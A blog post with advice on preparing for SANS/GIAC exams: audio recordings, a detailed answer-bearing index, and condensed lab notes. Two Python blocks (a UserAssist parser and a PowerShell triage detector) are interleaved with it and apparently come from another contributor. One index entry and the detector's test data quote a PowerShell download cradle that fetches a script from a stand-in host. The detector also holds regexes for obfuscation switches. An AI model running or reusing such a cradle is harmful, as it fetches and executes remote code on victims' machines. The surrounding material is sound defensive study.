How I Prepare for SANS/GIAC Exams (After Taking 9 of Them)

Let's Get Real About SANS Exams

After nine SANS certifications, I've figured out what works (and what doesn't) for actually passing these things. Everyone's got their own method, but here's mine - the one that's consistently gotten me through exams without losing my sanity.

Fair warning: this isn't the "official" way to do it. It's just what works for me, and maybe it'll work for you too.

The Audio Method: Live Class Recordings Hit Different

Here's something most people don't realize: SANS provides MP3 recordings from actual live classes - not just the OnDemand videos. These are recordings from the 5-day live courses, one for each book.

I download all the MP3s and listen to them like podcasts during my commute, while walking the dog, or when I'm doing mindless tasks around the house.

Why live recordings are better than videos:

  • You get real student questions - "Wait, can you explain that again?" moments that mirror your own confusion
  • Instructors go off-script with war stories and tips they don't include in the polished videos
  • The natural flow of conversation is easier to follow than scripted content
  • When an instructor says "this WILL be on the exam" in response to a question, you know they mean it

The reality check on audio-only learning: Some concepts just don't translate well without visuals:

  • GPYC (Python): Trying to understand code indentation and syntax through audio alone? Not ideal.
  • GCFE (Forensics): Those long registry keys like "HKLM\SYSTEM\CurrentControlSet\Services\bam\State\UserSettings{SID}" just become word soup
  • GCIA (Packet Analysis): Hard to visualize packet structure without seeing the hex dumps

But here's the thing - I'm not trying to learn everything through audio. I'm:

  • Reinforcing concepts I'll read later
  • Catching explanations that might click better when heard vs read
  • Getting familiar with the instructor's emphasis on what's important
  • Absorbing the material during time that would otherwise be wasted

The key is treating it like a podcast that's priming your brain for the real studying, not as your primary learning method. Sometimes I'll hear an instructor explain something and think "oh, THAT'S what that means" - even if I need to see it visually later to fully understand.

The Index: Where 90% of My Learning Actually Happens

Here's the thing about my index that I didn't fully explain before - creating the index IS my studying. I'm not just building a reference tool; I'm actively learning and processing the material as I index it.

When I say I spend 60% of my prep time on the index, what I really mean is that building the index is how I study. It forces me to:

  • Actually read every page (not skim)
  • Decide what's important enough to index
  • Understand concepts well enough to write them in my own words
  • Think about how I'll search for this information under pressure
  • Organize everything alphabetically for rapid lookup with tabs

My Actual Indexing Process (With Real Examples)

Let me show you what my index entries actually look like in Google Sheets. I use a four-column format that turns my index into a searchable knowledge base:

My Google Sheets Setup:

  • Column A: Topic/Category
  • Column B: Detailed Description/Answer
  • Column C: Page Reference
  • Column D: Book Number (when multiple books)

Instead of just: "TCP Flags - p.89"

What my spreadsheet actually contains:

Title: TCP Flags > SYN+ACK > Server Response
Description: Indicates open port - If SYN sent first, SYN+ACK means port is open and listening
Page: 89-91
Book: 1

Title: TCP Flags > RST > Connection Refused  
Description: Port closed or filtered - Immediate termination of connection attempt
Page: 92
Book: 1

Title: TCP Flags > Combinations > Xmas Tree Scan
Description: FIN+PSH+URG flags all set - All lit up like Christmas - Used for OS fingerprinting
Page: 93
Book: 1

See the difference? The description column contains the actual answer, not just a topic reference. During the exam, I can search for any keyword and the answer is right there - no page flipping required.

The "Answer in the Index" Approach

Here's my secret - I put the actual answer in my Description column. Look at this example from my GCFE index:

What most people index: "Registry Analysis - p.234"

What my Google Sheets index contains:

Title: Registry > UserAssist > ROT13 Encoded
Description: Shows GUI program execution with run count and last run time. 
             Decode with CyberChef or tr 'A-Za-z' 'N-ZA-Mn-za-m'. 
             Location: NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist. 
             Contains: Execution count (runs) + Focus time + Last execution timestamp
Page: 234-237
Book: 2

During the exam, I don't have to flip to page 234 in the course book - the complete answer is right there in my printed index. This is huge when you're working with physical materials. Instead of:

  1. Find topic in index
  2. Note page number
  3. Find course book
  4. Flip to page 234
  5. Read and understand
  6. Answer question

I just:

  1. Find topic in index
  2. Read answer
  3. Move on

That's the difference between 3 minutes and 30 seconds per question.
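The UserAssist entry above packs three facts into one row: the value names are ROT13-encoded, the tr command undoes that, and each value carries a run count, focus time and last-execution timestamp. This added example (mine, not from the article or the course) does both halves in Python: the ROT13 decode and a parser for the 72-byte value layout used on Windows 7 and later, which I am assuming here (run count at offset 4, focus count at 8, focus time in milliseconds at 12, FILETIME at 60). The value name and the 72 bytes are constructed test data, not a real registry export.

```python
import codecs
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

# Constructed value name in the ROT13 form the registry stores; decodes to
# {ABCD1234-0000-0000-0000-000000000000}\notepad.exe. Not a real export.
SAMPLE_NAME = r"{NOPQ1234-0000-0000-0000-000000000000}\abgrcnq.rkr"


def rot13_decode(name):
    """Same transform as tr 'A-Za-z' 'N-ZA-Mn-za-m'; digits, braces and dashes pass through."""
    return codecs.decode(name, "rot_13")


def filetime_to_datetime(ft):
    """FILETIME is 100-ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    """Inverse of the above using integer math only (used to build the sample)."""
    td = dt - FILETIME_EPOCH
    return (td.days * 86400 + td.seconds) * 10_000_000 + td.microseconds * 10


def parse_userassist_value(data):
    """Parse one 72-byte UserAssist Count entry (Windows 7+ layout, assumed here):
    run count at offset 4, focus count at 8, focus time in ms at 12, FILETIME at 60."""
    if len(data) != 72:
        raise ValueError(f"expected 72-byte UserAssist value, got {len(data)}")
    run_count, focus_count, focus_ms = struct.unpack_from("<III", data, 4)
    (last_run_ft,) = struct.unpack_from("<Q", data, 60)
    return {
        "run_count": run_count,
        "focus_count": focus_count,
        "focus_time_s": focus_ms / 1000,
        # A zero FILETIME means no recorded execution, not 1601-01-01.
        "last_run": filetime_to_datetime(last_run_ft) if last_run_ft else None,
    }


def build_sample_value(run_count, focus_count, focus_ms, last_run):
    """Constructed test bytes in the same 72-byte layout."""
    return (struct.pack("<IIII", 0, run_count, focus_count, focus_ms)
            + bytes(44) + struct.pack("<Q", datetime_to_filetime(last_run)) + bytes(4))


# Constructed record: notepad run 7 times, 90 s of focus, last run 2024-03-15 14:30 UTC.
SAMPLE_VALUE = build_sample_value(7, 3, 90_000, datetime(2024, 3, 15, 14, 30, tzinfo=timezone.utc))
```

Real entries live under the Count subkey of each GUID below the UserAssist path given in the index row; the same parser applies to each value there.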

Building Mental Models Through Indexing

The real magic happens when you create entries that show relationships. Here's how I indexed incident response phases in my spreadsheet:

Title: IR Process > Preparation
Description: "Do we have a plan?" - If no, you're already behind. 
             Includes: Team roles, contact lists, tools, practice scenarios
Page: 45-48
Book: 1

Title: IR Process > Identification  
Description: "Is this actually bad?" - Don't cry wolf. 
             Triage process, initial indicators, escalation criteria
Page: 49-50
Book: 1

Title: IR Process > Containment
Description: "Stop the bleeding" - Short-term: Pull cable, isolate system. 
             Long-term: Monitor, allow continued access for intelligence  
Page: 50-51
Book: 1

Title: IR Process > Eradication
Description: "Kill it with fire" - But find root cause first. 
             Remove malware, close vulnerabilities, eliminate backdoors
Page: 51
Book: 1

Title: IR Process > Recovery
Description: "Prove it's really dead" - Validate before declaring victory. 
             Restoration procedures, monitoring for reinfection
Page: 52
Book: 1

Title: IR Process > Lessons Learned
Description: "Don't let this happen again" - Document everything. 
             What worked, what didn't, timeline, improvements needed
Page: 52
Book: 1

This isn't just an index - it's a mental model that sticks in my brain. The Description column contains both the concept and the practical application.

Why This Level of Detail Works

The Google Sheets Build → Print Reality

Let me be clear about something crucial: I build my index in Google Sheets, but I can only bring printed materials to the exam. No laptops, no Ctrl+F, just good old paper.

Using Google Sheets for building gives me:

  • Easy editing and reorganization while studying
  • Ability to add rows and fix mistakes
  • Sort by different columns during creation
  • Clean formatting that prints nicely

But on exam day, I'm working with 40-50 pages of printed spreadsheet organized alphabetically. That's why the multiple keywords are absolutely critical - I can't search digitally, so I need multiple mental pathways to the same information.

Why Multiple Keywords Matter Even More on Paper: When I'm staring at an exam question about "lateral movement," I need to be able to flip to the right letter section using the sticky ABC tabs and find it whether my brain thinks:

  • "Lateral movement" (flip to L)
  • "RDP" (flip to R if the question mentions port 3389)
  • "Event logs" (flip to E if it's about 4624)
  • "Network" (flip to N if it's about traffic)
  • "Workstation" (flip to W if that's how the question phrases it)

Each of these keywords appears in my Title column for the same concept, giving me multiple chances to find it. With alphabetical tabs, I can get to any letter section in seconds, then scan for the specific entry.

Cross-Referencing Everything

Take "PowerShell" as an example. In my spreadsheet, I have multiple rows for the same concept approached from different angles:

Title: PowerShell > Malicious Use > Download Cradles
Description: IEX (New-Object Net.WebClient).DownloadString('http://bad.com/evil.ps1') 
             Common technique for fileless malware
Page: 234
Book: 2

Title: Windows > Living Off the Land > PowerShell.exe
Description: Built-in Windows tool abused by attackers 
             Check for encoded commands, unusual execution policies, web requests
Page: 156
Book: 1

Title: Event Logs > 4104 > PowerShell Script Block
Description: Logs actual PowerShell commands executed - Even if obfuscated. 
             Enable in Group Policy for detection
Page: 278
Book: 3

Title: Incident Response > Collection > PowerShell
Description: Get-WinEvent, Get-Process, Get-NetTCPConnection 
             Built-in cmdlets for live response
Page: 389
Book: 2

Title: Blue Team > Detection > PowerShell
Description: Suspicious indicators: -enc, -nop, -w hidden, downloads, 
             base64 strings, bypass execution policy
Page: 445
Book: 3

Why this redundancy is critical when you can't Ctrl+F: In the exam, I don't know if the question will approach PowerShell from a forensics angle, an incident response angle, or a detection angle. When I'm flipping through printed pages, I need multiple entry points.

If the question mentions "event ID 4104," I'll find it under Event Logs. If it asks about "living off the land," I'll find it under Windows. If it's about "incident response commands," I'll find it there. Same information, multiple paths to get there - because I only get one shot at finding it quickly on paper.
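The "Blue Team > Detection > PowerShell" and "Event Logs > 4104" rows above list the indicators (-enc, -nop, -w hidden, bypass, downloads, base64) but not how they combine. This added example, which is mine and not from the article, turns those rows into a small triage routine: it scores constructed command lines against the indicators, decodes any -EncodedCommand payload (base64 of UTF-16LE) and re-scans the decoded text, since the cradle keywords never appear in the raw line. The sample lines, including the one with the article's download cradle pointed at a reserved example.invalid host, are constructed test data.

```python
import base64
import re

# Constructed command lines standing in for 4688 process creation or 4104
# script block entries; not taken from the article or any real log.
SAMPLE_LINES = [
    "powershell.exe -nop -w hidden -enc " + base64.b64encode(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')"
        .encode("utf-16-le")).decode(),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe Get-Process | Where-Object CPU -gt 100",
]

# Indicators from the index rows as regexes. powershell.exe accepts any
# unambiguous prefix of a switch, so -e, -ec and -enc all mean -EncodedCommand.
INDICATORS = {
    "encoded_command": re.compile(r"(?i)\s-e(?:c|nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{8,}"),
    "no_profile": re.compile(r"(?i)\s-nop(?:rofile)?\b"),
    "hidden_window": re.compile(r"(?i)\s-w(?:indowstyle)?\s+hidden\b"),
    "bypass_policy": re.compile(r"(?i)\s-e(?:p|x|xecutionpolicy)?\s+bypass\b"),
    "download": re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"),
    "invoke_expression": re.compile(r"(?i)\biex\b|invoke-expression"),
}


def decode_encoded_command(line):
    """Return the UTF-16LE text behind an -EncodedCommand switch, or None."""
    m = INDICATORS["encoded_command"].search(line)
    if not m:
        return None
    b64 = m.group(0).split()[-1]
    try:
        return base64.b64decode(b64).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_line(line):
    """Count indicator hits on the raw line plus the decoded payload, if any."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(line)}
    decoded = decode_encoded_command(line)
    if decoded:
        # The cradle only becomes visible after decoding, so scan it too.
        hits |= {name for name, rx in INDICATORS.items() if rx.search(decoded)}
    return {"line": line, "hits": sorted(hits), "decoded": decoded, "score": len(hits)}


def triage(lines):
    """Score every line; sort by score descending to review the worst first."""
    return sorted((score_line(l) for l in lines), key=lambda r: -r["score"])
```

The second sample line shows why a single indicator is weak evidence: a signed backup script run with -ExecutionPolicy Bypass scores one hit, while the encoded cradle lights up five.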

The Lab Reality Check

Let me be honest about labs - they're valuable, but I approach them strategically based on the course content.

How I Actually Handle Labs:

For courses with heavy hands-on components (GCFE, GCFA, GPYC, GCIA), I do most of the labs because you need that muscle memory. For more conceptual courses without CyberLive, I might do fewer labs, but I always at least read through them to understand the process.

When I do labs, I create ultra-condensed notes that capture just the essential steps. These go in a separate Word document - not in my main index. Here's an example from GCFE:

Original Lab Instructions: "In this lab, you will learn to use Arsenal Image Mounter to mount forensic images, understand the various mounting options, configure the tool for forensic analysis..." (goes on for 3 pages outlining each step)

What I Write in My Lab Notes:

Lab 1.1 - Mount Image with AIM
1. Open Arsenal Image Mounter → "Mount Image"
2. Select .E01 file
3. Choose "disk device, write temp" → OK
4. Note mount point (usually E:\)
5. May need to show hidden files in options

That's it. Five lines instead of three pages. During the exam, I don't need the theory - I need the steps.

Another Example - Registry Analysis:

Lab 2.1 - SAM User Profiling
1. Mount VHDX via KAPE
2. Registry Explorer → Load Hive → E:\C\Windows\System32\config\SAM
3. Navigate: SAM\Domains\Accounts\Users → View "Users" tab
4. Check RID >1000 = user created (not default)
5. Cloud accounts show 0 login count
6. Convert RID to hex (1002 = 3EA) → find matching Users subkey

The magic is in distilling complex procedures down to the bare essentials. I'm not learning the tool during the exam - I just need to remember the workflow.

My Lab Note Process:

  1. First Pass: Do the lab while writing down every single click/command
  2. Second Pass: Remove all explanation, theory, and "why" content
  3. Final Version: Just the commands and critical decision points
  4. Print Separately: These become their own reference document

Why I Keep Lab Notes Separate:

  • Lab procedures are sequential - different from the alphabetical index
  • I might need to follow a specific workflow step-by-step
  • Keeps my main index focused on concepts and facts
  • Lab notes are usually only 5-10 pages vs 40-50 for the index

The Truth About "Skipping" Labs: Even when I think I might skip labs in certain courses, I usually end up doing at least some because:

  • Sometimes the lab reveals a tool feature not mentioned in the lecture
  • Instructors often drop exam hints during lab walkthroughs
  • The hands-on experience sticks differently than reading about it
  • Lab-based questions on the exam are easier when you've actually done it
  • That "aha!" moment when something clicks during a lab is invaluable
  • The labs can still be on the test, they just aren't "hands on" like CyberLive

The key is being strategic - do the labs that will help you understand core concepts, and always create those condensed notes for the ones you do.

Why the condensed notes hold up under exam pressure:

  • Variables change (different usernames, paths, etc.) but the process stays the same
  • I'm not memorizing - I'm creating a personal runbook
  • The act of condensing forces me to understand what's actually important
  • During the exam, I can execute the process without thinking

The Bottom Line

My method works because I'm not forcing myself to memorize anything. I'm building a personalized reference system that mirrors how my brain actually works. The heavy lifting happens during index creation - by exam time, I've already processed the information multiple times:

  1. First pass: Listening to audio (passive absorption)
  2. Second pass: Reading the book while indexing (active processing)
  3. Third pass: Condensing lab procedures to essential steps (practical application)
  4. Fourth pass: Organizing and cross-referencing everything (deep understanding)
  5. Fifth pass: Practice tests to refine the index (exam preparation)

By exam day, finding answers is just muscle memory, and after all of this work-up you probably won't need 90% of what you built - you'll just know it.

The index isn't just a tool - it's the entire studying process condensed into a searchable format. When you put the answers directly in your index entries, condense lab commands to their essential steps, organize everything in multiple ways, and create mental models instead of just page references, you're not just preparing for the exam - you're actually learning the material.
